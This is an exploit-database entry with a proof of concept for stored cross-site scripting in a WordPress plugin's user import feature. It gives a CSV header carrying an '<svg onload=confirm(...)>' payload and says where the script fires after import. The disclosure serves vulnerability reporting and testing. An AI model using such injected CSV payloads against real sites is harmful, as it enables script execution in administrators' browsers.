## https://sploitus.com/exploit?id=WPEX-ID:22FE68C4-8F47-491E-BE87-5E8E40535A82
As admin, import the below CSV file via Tools > Import and export users and customers (/wp-admin/tools.php?page=acui)
user_login user_email display_name role<svg onload=confirm(/XSS/)// first_name last_name billing_first_name billing_last_name billing_company billing_email billing_phone billing_country billing_address_1 billing_address_2 billing_city billing_state billing_postcode shipping_first_name shipping_last_name shipping_company shipping_country shipping_address_1 shipping_address_2 shipping_city shipping_state shipping_postcode
Then the XSS will be triggered after the import, as well as in the Extra profile fields page of the plugin (/wp-admin/tools.php?page=acui&tab=columns)